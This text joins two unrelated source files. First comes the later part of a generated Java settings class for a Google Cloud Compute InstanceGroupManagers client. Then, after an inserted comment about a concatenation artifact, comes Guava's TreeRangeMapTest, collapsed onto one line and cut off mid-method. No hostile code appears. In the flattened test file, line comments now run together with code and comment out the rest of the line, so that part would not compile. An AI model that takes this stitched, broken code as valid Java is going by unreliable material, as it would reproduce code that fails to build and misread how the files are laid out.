  public OperationCallSettings<
          DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
      deletePerInstanceConfigsOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .deletePerInstanceConfigsOperationSettings();
  }

  /** Returns the object with the settings used for calls to get. */
  public UnaryCallSettings<GetInstanceGroupManagerRequest, InstanceGroupManager> getSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).getSettings();
  }

  /** Returns the object with the settings used for calls to insert. */
  public UnaryCallSettings<InsertInstanceGroupManagerRequest, Operation> insertSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).insertSettings();
  }

  /** Returns the object with the settings used for calls to insert. */
  public OperationCallSettings<InsertInstanceGroupManagerRequest, Operation, Operation>
      insertOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).insertOperationSettings();
  }

  /** Returns the object with the settings used for calls to list. */
  public PagedCallSettings<
          ListInstanceGroupManagersRequest, InstanceGroupManagerList, ListPagedResponse>
      listSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).listSettings();
  }

  /** Returns the object with the settings used for calls to listErrors. */
  public PagedCallSettings<
          ListErrorsInstanceGroupManagersRequest,
          InstanceGroupManagersListErrorsResponse,
          ListErrorsPagedResponse>
      listErrorsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).listErrorsSettings();
  }

  /** Returns the object with the settings used for calls to listManagedInstances. */
  public PagedCallSettings<
          ListManagedInstancesInstanceGroupManagersRequest,
          InstanceGroupManagersListManagedInstancesResponse,
          ListManagedInstancesPagedResponse>
      listManagedInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).listManagedInstancesSettings();
  }

  /** Returns the object with the settings used for calls to listPerInstanceConfigs. */
  public PagedCallSettings<
          ListPerInstanceConfigsInstanceGroupManagersRequest,
          InstanceGroupManagersListPerInstanceConfigsResp,
          ListPerInstanceConfigsPagedResponse>
      listPerInstanceConfigsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).listPerInstanceConfigsSettings();
  }

  /** Returns the object with the settings used for calls to patch. */
  public UnaryCallSettings<PatchInstanceGroupManagerRequest, Operation> patchSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).patchSettings();
  }

  /** Returns the object with the settings used for calls to patch. */
  public OperationCallSettings<PatchInstanceGroupManagerRequest, Operation, Operation>
      patchOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).patchOperationSettings();
  }

  /** Returns the object with the settings used for calls to patchPerInstanceConfigs. */
  public UnaryCallSettings<PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation>
      patchPerInstanceConfigsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .patchPerInstanceConfigsSettings();
  }

  /** Returns the object with the settings used for calls to patchPerInstanceConfigs. */
  public OperationCallSettings<
          PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
      patchPerInstanceConfigsOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .patchPerInstanceConfigsOperationSettings();
  }

  /** Returns the object with the settings used for calls to recreateInstances. */
  public UnaryCallSettings<RecreateInstancesInstanceGroupManagerRequest, Operation>
      recreateInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).recreateInstancesSettings();
  }

  /** Returns the object with the settings used for calls to recreateInstances. */
  public OperationCallSettings<RecreateInstancesInstanceGroupManagerRequest, Operation, Operation>
      recreateInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .recreateInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to resize. */
  public UnaryCallSettings<ResizeInstanceGroupManagerRequest, Operation> resizeSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).resizeSettings();
  }

  /** Returns the object with the settings used for calls to resize. */
  public OperationCallSettings<ResizeInstanceGroupManagerRequest, Operation, Operation>
      resizeOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).resizeOperationSettings();
  }

  /** Returns the object with the settings used for calls to resumeInstances. */
  public UnaryCallSettings<ResumeInstancesInstanceGroupManagerRequest, Operation>
      resumeInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).resumeInstancesSettings();
  }

  /** Returns the object with the settings used for calls to resumeInstances. */
  public OperationCallSettings<ResumeInstancesInstanceGroupManagerRequest, Operation, Operation>
      resumeInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .resumeInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to setInstanceTemplate. */
  public UnaryCallSettings<SetInstanceTemplateInstanceGroupManagerRequest, Operation>
      setInstanceTemplateSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).setInstanceTemplateSettings();
  }

  /** Returns the object with the settings used for calls to setInstanceTemplate. */
  public OperationCallSettings<SetInstanceTemplateInstanceGroupManagerRequest, Operation, Operation>
      setInstanceTemplateOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .setInstanceTemplateOperationSettings();
  }

  /** Returns the object with the settings used for calls to setTargetPools. */
  public UnaryCallSettings<SetTargetPoolsInstanceGroupManagerRequest, Operation>
      setTargetPoolsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).setTargetPoolsSettings();
  }

  /** Returns the object with the settings used for calls to setTargetPools. */
  public OperationCallSettings<SetTargetPoolsInstanceGroupManagerRequest, Operation, Operation>
      setTargetPoolsOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .setTargetPoolsOperationSettings();
  }

  /** Returns the object with the settings used for calls to startInstances. */
  public UnaryCallSettings<StartInstancesInstanceGroupManagerRequest, Operation>
      startInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).startInstancesSettings();
  }

  /** Returns the object with the settings used for calls to startInstances. */
  public OperationCallSettings<StartInstancesInstanceGroupManagerRequest, Operation, Operation>
      startInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .startInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to stopInstances. */
  public UnaryCallSettings<StopInstancesInstanceGroupManagerRequest, Operation>
      stopInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).stopInstancesSettings();
  }

  /** Returns the object with the settings used for calls to stopInstances. */
  public OperationCallSettings<StopInstancesInstanceGroupManagerRequest, Operation, Operation>
      stopInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).stopInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to suspendInstances. */
  public UnaryCallSettings<SuspendInstancesInstanceGroupManagerRequest, Operation>
      suspendInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).suspendInstancesSettings();
  }

  /** Returns the object with the settings used for calls to suspendInstances. */
  public OperationCallSettings<SuspendInstancesInstanceGroupManagerRequest, Operation, Operation>
      suspendInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .suspendInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to updatePerInstanceConfigs. */
  public UnaryCallSettings<UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation>
      updatePerInstanceConfigsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .updatePerInstanceConfigsSettings();
  }

  /** Returns the object with the settings used for calls to updatePerInstanceConfigs. */
  public OperationCallSettings<
          UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
      updatePerInstanceConfigsOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .updatePerInstanceConfigsOperationSettings();
  }

  // Wraps an existing stub settings object in the higher-level settings type.
  public static final InstanceGroupManagersSettings create(InstanceGroupManagersStubSettings stub)
      throws IOException {
    return new InstanceGroupManagersSettings.Builder(stub.toBuilder()).build();
  }

  /** Returns a builder for the default ExecutorProvider for this service. */
  public static InstantiatingExecutorProvider.Builder defaultExecutorProviderBuilder() {
    return InstanceGroupManagersStubSettings.defaultExecutorProviderBuilder();
  }

  /** Returns the default service endpoint. */
  public static String getDefaultEndpoint() {
    return InstanceGroupManagersStubSettings.getDefaultEndpoint();
  }

  /** Returns the default service scopes. */
  public static List<String> getDefaultServiceScopes() {
    return InstanceGroupManagersStubSettings.getDefaultServiceScopes();
  }

  /** Returns a builder for the default credentials for this service. */
  public static GoogleCredentialsProvider.Builder defaultCredentialsProviderBuilder() {
    return InstanceGroupManagersStubSettings.defaultCredentialsProviderBuilder();
  }

  /** Returns a builder for the default ChannelProvider for this service. */
  public static InstantiatingHttpJsonChannelProvider.Builder
      defaultHttpJsonTransportProviderBuilder() {
    return InstanceGroupManagersStubSettings.defaultHttpJsonTransportProviderBuilder();
  }

  // Default transport for the Compute API is HTTP/JSON (not gRPC), hence the provider above.
  public static TransportChannelProvider defaultTransportChannelProvider() {
    return InstanceGroupManagersStubSettings.defaultTransportChannelProvider();
  }

  public static ApiClientHeaderProvider.Builder defaultApiClientHeaderProviderBuilder() {
    return InstanceGroupManagersStubSettings.defaultApiClientHeaderProviderBuilder();
  }

  /** Returns a new builder for this class. */
  public static Builder newBuilder() {
    return Builder.createDefault();
  }

  /** Returns a new builder for this class. */
  public static Builder newBuilder(ClientContext clientContext) {
    return new Builder(clientContext);
  }

  /** Returns a builder containing all the values of this settings class. */
  public Builder toBuilder() {
    return new Builder(this);
  }

  protected InstanceGroupManagersSettings(Builder settingsBuilder) throws IOException {
    super(settingsBuilder);
  }

  /** Builder for InstanceGroupManagersSettings. */
  public static class Builder
      extends ClientSettings.Builder<InstanceGroupManagersSettings, Builder> {

    protected Builder() throws IOException {
      this(((ClientContext) null));
    }

    protected Builder(ClientContext clientContext) {
      super(InstanceGroupManagersStubSettings.newBuilder(clientContext));
    }

    protected Builder(InstanceGroupManagersSettings settings) {
      super(settings.getStubSettings().toBuilder());
    }

    protected Builder(InstanceGroupManagersStubSettings.Builder stubSettings) {
      super(stubSettings);
    }

    private static Builder createDefault() {
      return new Builder(InstanceGroupManagersStubSettings.newBuilder());
    }

    // Narrows the superclass's stub settings builder to the concrete generated type.
    public InstanceGroupManagersStubSettings.Builder getStubSettingsBuilder() {
      return ((InstanceGroupManagersStubSettings.Builder) getStubSettings());
    }

    /**
     * Applies the given settings updater function to all of the unary API methods in this service.
     *
     * <p>Note: This method does not support applying settings to streaming methods.
     */
    public Builder applyToAllUnaryMethods(
        ApiFunction<UnaryCallSettings.Builder<?, ?>, Void> settingsUpdater) {
      super.applyToAllUnaryMethods(
          getStubSettingsBuilder().unaryMethodSettingsBuilders(), settingsUpdater);
      return this;
    }

    /** Returns the builder for the settings used for calls to abandonInstances. */
    public UnaryCallSettings.Builder<AbandonInstancesInstanceGroupManagerRequest, Operation>
        abandonInstancesSettings() {
      return getStubSettingsBuilder().abandonInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to abandonInstances. */
    public OperationCallSettings.Builder<
            AbandonInstancesInstanceGroupManagerRequest, Operation, Operation>
        abandonInstancesOperationSettings() {
      return getStubSettingsBuilder().abandonInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to aggregatedList. */
    public PagedCallSettings.Builder<
            AggregatedListInstanceGroupManagersRequest,
            InstanceGroupManagerAggregatedList,
            AggregatedListPagedResponse>
        aggregatedListSettings() {
      return getStubSettingsBuilder().aggregatedListSettings();
    }

    /** Returns the builder for the settings used for calls to applyUpdatesToInstances. */
    public UnaryCallSettings.Builder<ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation>
        applyUpdatesToInstancesSettings() {
      return getStubSettingsBuilder().applyUpdatesToInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to applyUpdatesToInstances. */
    public OperationCallSettings.Builder<
            ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation, Operation>
        applyUpdatesToInstancesOperationSettings() {
      return getStubSettingsBuilder().applyUpdatesToInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to createInstances. */
    public UnaryCallSettings.Builder<CreateInstancesInstanceGroupManagerRequest, Operation>
        createInstancesSettings() {
      return getStubSettingsBuilder().createInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to createInstances. */
    public OperationCallSettings.Builder<
            CreateInstancesInstanceGroupManagerRequest, Operation, Operation>
        createInstancesOperationSettings() {
      return getStubSettingsBuilder().createInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to delete. */
    public UnaryCallSettings.Builder<DeleteInstanceGroupManagerRequest, Operation>
        deleteSettings() {
      return getStubSettingsBuilder().deleteSettings();
    }

    /** Returns the builder for the settings used for calls to delete. */
    public OperationCallSettings.Builder<DeleteInstanceGroupManagerRequest, Operation, Operation>
        deleteOperationSettings() {
      return getStubSettingsBuilder().deleteOperationSettings();
    }

    /** Returns the builder for the settings used for calls to deleteInstances. */
    public UnaryCallSettings.Builder<DeleteInstancesInstanceGroupManagerRequest, Operation>
        deleteInstancesSettings() {
      return getStubSettingsBuilder().deleteInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to deleteInstances. */
    public OperationCallSettings.Builder<
            DeleteInstancesInstanceGroupManagerRequest, Operation, Operation>
        deleteInstancesOperationSettings() {
      return getStubSettingsBuilder().deleteInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to deletePerInstanceConfigs. */
    public UnaryCallSettings.Builder<DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation>
        deletePerInstanceConfigsSettings() {
      return getStubSettingsBuilder().deletePerInstanceConfigsSettings();
    }

    /** Returns the builder for the settings used for calls to deletePerInstanceConfigs. */
    public OperationCallSettings.Builder<
            DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
        deletePerInstanceConfigsOperationSettings() {
      return getStubSettingsBuilder().deletePerInstanceConfigsOperationSettings();
    }

    /** Returns the builder for the settings used for calls to get. */
    public UnaryCallSettings.Builder<GetInstanceGroupManagerRequest, InstanceGroupManager>
        getSettings() {
      return getStubSettingsBuilder().getSettings();
    }

    /** Returns the builder for the settings used for calls to insert. */
    public UnaryCallSettings.Builder<InsertInstanceGroupManagerRequest, Operation>
        insertSettings() {
      return getStubSettingsBuilder().insertSettings();
    }

    /** Returns the builder for the settings used for calls to insert. */
    public OperationCallSettings.Builder<InsertInstanceGroupManagerRequest, Operation, Operation>
        insertOperationSettings() {
      return getStubSettingsBuilder().insertOperationSettings();
    }

    /** Returns the builder for the settings used for calls to list. */
    public PagedCallSettings.Builder<
            ListInstanceGroupManagersRequest, InstanceGroupManagerList, ListPagedResponse>
        listSettings() {
      return getStubSettingsBuilder().listSettings();
    }

    /** Returns the builder for the settings used for calls to listErrors. */
    public PagedCallSettings.Builder<
            ListErrorsInstanceGroupManagersRequest,
            InstanceGroupManagersListErrorsResponse,
            ListErrorsPagedResponse>
        listErrorsSettings() {
      return getStubSettingsBuilder().listErrorsSettings();
    }

    /** Returns the builder for the settings used for calls to listManagedInstances. */
    public PagedCallSettings.Builder<
            ListManagedInstancesInstanceGroupManagersRequest,
            InstanceGroupManagersListManagedInstancesResponse,
            ListManagedInstancesPagedResponse>
        listManagedInstancesSettings() {
      return getStubSettingsBuilder().listManagedInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to listPerInstanceConfigs. */
    public PagedCallSettings.Builder<
            ListPerInstanceConfigsInstanceGroupManagersRequest,
            InstanceGroupManagersListPerInstanceConfigsResp,
            ListPerInstanceConfigsPagedResponse>
        listPerInstanceConfigsSettings() {
      return getStubSettingsBuilder().listPerInstanceConfigsSettings();
    }

    /** Returns the builder for the settings used for calls to patch. */
    public UnaryCallSettings.Builder<PatchInstanceGroupManagerRequest, Operation> patchSettings() {
      return getStubSettingsBuilder().patchSettings();
    }

    /** Returns the builder for the settings used for calls to patch. */
    public OperationCallSettings.Builder<PatchInstanceGroupManagerRequest, Operation, Operation>
        patchOperationSettings() {
      return getStubSettingsBuilder().patchOperationSettings();
    }

    /** Returns the builder for the settings used for calls to patchPerInstanceConfigs. */
    public UnaryCallSettings.Builder<PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation>
        patchPerInstanceConfigsSettings() {
      return getStubSettingsBuilder().patchPerInstanceConfigsSettings();
    }

    /** Returns the builder for the settings used for calls to patchPerInstanceConfigs. */
    public OperationCallSettings.Builder<
            PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
        patchPerInstanceConfigsOperationSettings() {
      return getStubSettingsBuilder().patchPerInstanceConfigsOperationSettings();
    }

    /** Returns the builder for the settings used for calls to recreateInstances. */
    public UnaryCallSettings.Builder<RecreateInstancesInstanceGroupManagerRequest, Operation>
        recreateInstancesSettings() {
      return getStubSettingsBuilder().recreateInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to recreateInstances. */
    public OperationCallSettings.Builder<
            RecreateInstancesInstanceGroupManagerRequest, Operation, Operation>
        recreateInstancesOperationSettings() {
      return getStubSettingsBuilder().recreateInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to resize. */
    public UnaryCallSettings.Builder<ResizeInstanceGroupManagerRequest, Operation>
        resizeSettings() {
      return getStubSettingsBuilder().resizeSettings();
    }

    /** Returns the builder for the settings used for calls to resize. */
    public OperationCallSettings.Builder<ResizeInstanceGroupManagerRequest, Operation, Operation>
        resizeOperationSettings() {
      return getStubSettingsBuilder().resizeOperationSettings();
    }

    /** Returns the builder for the settings used for calls to resumeInstances. */
    public UnaryCallSettings.Builder<ResumeInstancesInstanceGroupManagerRequest, Operation>
        resumeInstancesSettings() {
      return getStubSettingsBuilder().resumeInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to resumeInstances. */
    public OperationCallSettings.Builder<
            ResumeInstancesInstanceGroupManagerRequest, Operation, Operation>
        resumeInstancesOperationSettings() {
      return getStubSettingsBuilder().resumeInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to setInstanceTemplate. */
    public UnaryCallSettings.Builder<SetInstanceTemplateInstanceGroupManagerRequest, Operation>
        setInstanceTemplateSettings() {
      return getStubSettingsBuilder().setInstanceTemplateSettings();
    }

    /** Returns the builder for the settings used for calls to setInstanceTemplate. */
    public OperationCallSettings.Builder<
            SetInstanceTemplateInstanceGroupManagerRequest, Operation, Operation>
        setInstanceTemplateOperationSettings() {
      return getStubSettingsBuilder().setInstanceTemplateOperationSettings();
    }

    /** Returns the builder for the settings used for calls to setTargetPools. */
    public UnaryCallSettings.Builder<SetTargetPoolsInstanceGroupManagerRequest, Operation>
        setTargetPoolsSettings() {
      return getStubSettingsBuilder().setTargetPoolsSettings();
    }

    /** Returns the builder for the settings used for calls to setTargetPools. */
    public OperationCallSettings.Builder<
            SetTargetPoolsInstanceGroupManagerRequest, Operation, Operation>
        setTargetPoolsOperationSettings() {
      return getStubSettingsBuilder().setTargetPoolsOperationSettings();
    }

    /** Returns the builder for the settings used for calls to startInstances. */
    public UnaryCallSettings.Builder<StartInstancesInstanceGroupManagerRequest, Operation>
        startInstancesSettings() {
      return getStubSettingsBuilder().startInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to startInstances. */
    public OperationCallSettings.Builder<
            StartInstancesInstanceGroupManagerRequest, Operation, Operation>
        startInstancesOperationSettings() {
      return getStubSettingsBuilder().startInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to stopInstances. */
    public UnaryCallSettings.Builder<StopInstancesInstanceGroupManagerRequest, Operation>
        stopInstancesSettings() {
      return getStubSettingsBuilder().stopInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to stopInstances. */
    public OperationCallSettings.Builder<
            StopInstancesInstanceGroupManagerRequest, Operation, Operation>
        stopInstancesOperationSettings() {
      return getStubSettingsBuilder().stopInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to suspendInstances. */
    public UnaryCallSettings.Builder<SuspendInstancesInstanceGroupManagerRequest, Operation>
        suspendInstancesSettings() {
      return getStubSettingsBuilder().suspendInstancesSettings();
    }

    /** Returns the builder for the settings used for calls to suspendInstances. */
    public OperationCallSettings.Builder<
            SuspendInstancesInstanceGroupManagerRequest, Operation, Operation>
        suspendInstancesOperationSettings() {
      return getStubSettingsBuilder().suspendInstancesOperationSettings();
    }

    /** Returns the builder for the settings used for calls to updatePerInstanceConfigs. */
    public UnaryCallSettings.Builder<UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation>
        updatePerInstanceConfigsSettings() {
      return getStubSettingsBuilder().updatePerInstanceConfigsSettings();
    }

    /** Returns the builder for the settings used for calls to updatePerInstanceConfigs. */
    public OperationCallSettings.Builder<
            UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation>
        updatePerInstanceConfigsOperationSettings() {
      return getStubSettingsBuilder().updatePerInstanceConfigsOperationSettings();
    }

    @Override
    public InstanceGroupManagersSettings build() throws IOException {
      return new InstanceGroupManagersSettings(this);
    }
  }
}
// ---- NOTE(review): concatenation artifact ----
// The three lines below were stray dataset metadata for the next embedded file, preserved here
// as comments so the surrounding Java remains parseable:
//   repo:  google/guava
//   size:  36,026
//   path:  guava-tests/test/com/google/common/collect/TreeRangeMapTest.java
/* * Copyright (C) 2011 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package com.google.common.collect; import static com.google.common.collect.BoundType.OPEN; import static com.google.common.collect.testing.Helpers.mapEntry; import static org.junit.Assert.assertThrows; import com.google.common.annotations.GwtIncompatible; import com.google.common.collect.testing.MapTestSuiteBuilder; import com.google.common.collect.testing.SampleElements; import com.google.common.collect.testing.TestMapGenerator; import com.google.common.collect.testing.features.CollectionFeature; import com.google.common.collect.testing.features.CollectionSize; import com.google.common.collect.testing.features.MapFeature; import com.google.common.testing.EqualsTester; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.NoSuchElementException; import java.util.function.BiFunction; import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.jspecify.annotations.NullUnmarked; /** * Tests for {@code TreeRangeMap}. 
* * @author Louis Wasserman */ @GwtIncompatible // NavigableMap @NullUnmarked public class TreeRangeMapTest extends TestCase { @AndroidIncompatible // test-suite builders public static Test suite() { TestSuite suite = new TestSuite(); suite.addTestSuite(TreeRangeMapTest.class); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.asMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering().onKeys().sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.asMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER, CollectionFeature.SUPPORTS_ITERATOR_REMOVE) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public 
SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.subRangeMap(Range.atMost(22)).asMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering().onKeys().sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.subRangeMap.asMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... 
elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.asDescendingMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering() .reverse() .onKeys() .sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.asDescendingMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER, CollectionFeature.SUPPORTS_ITERATOR_REMOVE) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... 
elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.subRangeMap(Range.atMost(22)).asDescendingMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering() .reverse() .onKeys() .sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.subRangeMap.asDescendingMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER) .createTestSuite()); return suite; } private static final ImmutableList<Range<Integer>> RANGES; private static final int MIN_BOUND = -2; private static final int MAX_BOUND = 2; static { ImmutableList.Builder<Range<Integer>> builder = ImmutableList.builder(); builder.add(Range.<Integer>all()); // Add one-ended ranges for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { for (BoundType type : BoundType.values()) { builder.add(Range.upTo(i, type)); builder.add(Range.downTo(i, type)); } } // Add two-ended ranges for (int i = MIN_BOUND; i <= MAX_BOUND; i++) { for (int j = i; j <= MAX_BOUND; j++) { for (BoundType lowerType : BoundType.values()) { for (BoundType upperType : BoundType.values()) { if (i == j & lowerType == OPEN & upperType == OPEN) { continue; } builder.add(Range.range(i, lowerType, j, upperType)); } } } } RANGES = builder.build(); } public void 
